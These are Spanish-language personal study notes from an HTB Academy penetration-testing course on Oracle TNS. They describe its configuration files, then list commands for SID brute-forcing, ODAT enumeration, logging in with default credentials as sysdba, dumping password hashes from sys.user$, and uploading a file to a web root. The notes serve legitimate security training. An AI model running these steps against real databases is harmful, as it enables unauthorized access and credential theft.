1521 (Oracle TNS)

Oracle TNS

NOTE El servidor Oracle Transparent Network Substrate (TNS) es un protocolo de comunicación que facilita el intercambio de datos entre bases de datos Oracle y aplicaciones a través de redes. Parte de la suite Oracle Net Services, TNS admite diversos protocolos de red como TCP/IP, IPX/SPX y AppleTalk.

IMPORTANT Con el tiempo, TNS ha evolucionado para soportar tecnologías como IPv6 y cifrado SSL/TLS, permitiendo:

• Resolución de nombres

• Gestión de conexiones

• Equilibrio de carga

• Mejora de la seguridad

---

Configuración predeterminada

NOTE Por defecto, el listener de Oracle TNS escucha en el puerto TCP 1521. Esta configuración puede modificarse durante o después de la instalación editando los archivos de configuración.

Puerto y listener

• Puerto por defecto: TCP/1521

• Protocolos admitidos: TCP/IP, UDP, IPX/SPX, AppleTalk

• Interfaces de red: Puede configurarse para escuchar en IPs específicas o en todas las disponibles.

Administración remota

• En Oracle 8i y 9i, la administración remota del listener está habilitada.

• Desde Oracle 10g y 11g, viene deshabilitada por defecto.

Seguridad básica

1. Hosts autorizados: Solo conexiones desde hosts permitidos.

2. Autenticación: Basada en nombres de host, direcciones IP, usuario y contraseña.

3. Cifrado: Uso de Oracle Net Services para cifrar el tráfico entre cliente y servidor.

Archivos de configuración

• tnsnames.ora: Define alias de conexión, host, puerto y parámetros de conexión.

ORCL =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
    )
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = orcl)
    )
  )

QUOTE Este ejemplo define un servicio ORCL en 10.129.11.102:1521 al que se accede mediante el nombre de servicio orcl.

• listener.ora: Controla los puertos, protocolos y servicios a los que escucha el listener.

SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC =
      (SID_NAME = PDB1)
      (ORACLE_HOME = C:\oracle\product\19.0.0\dbhome_1)
      (GLOBAL_DBNAME = PDB1)
      (SID_DIRECTORY_LIST =
        (SID_DIRECTORY =
          (DIRECTORY_TYPE = TNS_ADMIN)
          (DIRECTORY = C:\oracle\product\19.0.0\dbhome_1\network\admin)
        )
      )
    )
  )

LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )

ADR_BASE_LISTENER = C:\oracle

IMPORTANT tnsnames.ora permite a los clientes resolver servicios, y listener.ora define cómo el listener maneja esas solicitudes.

CAUTION La PlsqlExclusionList puede restringir el acceso a ciertas funciones PL/SQL desde Oracle Application Server. Se ubica en $ORACLE_HOME/sqldeveloper.

---

Parámetros de conexión

Configuración	Descripción
DESCRIPTION	Nombre de la base de datos y tipo de conexión.
ADDRESS	Dirección de red (host y puerto).
PROTOCOL	Protocolo de red (TCP, IPC, etc).
PORT	Puerto de conexión.
CONNECT_DATA	Atributos como SERVICE_NAME, SID, etc.
INSTANCE_NAME	Nombre de instancia de base de datos.
SERVICE_NAME	Nombre del servicio al que se conecta.
SERVER	Tipo de servidor (dedicado o compartido).
USER	Nombre de usuario para autenticación.
PASSWORD	Contraseña del usuario.
SECURITY	Nivel de seguridad.
VALIDATE_CERT	Validación de certificados SSL/TLS.
SSL_VERSION	Versión de SSL/TLS usada.
CONNECT_TIMEOUT	Tiempo límite de conexión.
RECEIVE_TIMEOUT	Tiempo límite para recibir respuesta.
SEND_TIMEOUT	Tiempo límite para enviar solicitudes.
SQLNET.EXPIRE_TIME	Tiempo para detectar caídas de conexión.
TRACE_LEVEL	Nivel de seguimiento.
TRACE_DIRECTORY	Directorio de logs de trazas.
TRACE_FILE_NAME	Nombre del archivo de traza.
LOG_FILE	Archivo de registro de eventos.

---

Herramientas necesarias

NOTE Para interactuar con Oracle, debemos instalar las siguientes dependencias:

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update

wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip

wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip

export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH

pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

Instalación de SQLPlus

---

ODAT

NOTE Oracle Database Attacking Tool (ODAT) es una herramienta en Python para pruebas de penetración sobre bases de datos Oracle.

./odat.py -h

---

Enumeración

# Enumeración básica con nmap
sudo nmap -p1521 -sV 10.129.204.235 --open

# Fuerza bruta de SID
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

# Enumeración completa con ODAT
./odat.py all -s 10.129.204.235

# Interacción con credenciales conocidas
sqlplus scott/tiger@10.129.204.235/XE

# Fix para errores de SQLPlus
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig

IMPORTANT En Oracle, un SID identifica de forma única una instancia de base de datos. Cada instancia tiene procesos y memoria propios. El cliente debe especificar el SID en su cadena de conexión.

Documentación de comandos SQLPlus

---

Interacción con Oracle

# Listar todas las tablas
select table_name from all_tables;

# Consultar contenido de una tabla
select * from user_role_privs;

# Conexión como sysdba
sqlplus scott/tiger@10.129.204.235/XE as sysdba

# Consultar privilegios
select * from user_role_privs;

# Extraer hashes de contraseña
select name, password from sys.user$;

TIP Podemos subir un archivo al servidor si conocemos la ruta del directorio web:

Sistema operativo	Ruta web por defecto
Linux	/var/www/html
Windows	C:\inetpub\wwwroot

# Subir archivo
echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

# Verificación
curl -X GET http://10.129.204.235/testing.txt

---

Redes sociales

• LinkedIn: https://www.linkedin.com/in/tuch0/

• Instagram: https://www.instagram.com/tuch0_/

• YouTube: https://www.youtube.com/@tuch0_

• GitHub: https://github.com/Tuch0

• Web personal: https://tuch0.com/

📄 Apuntes personales de HTB Academy. Para uso educativo.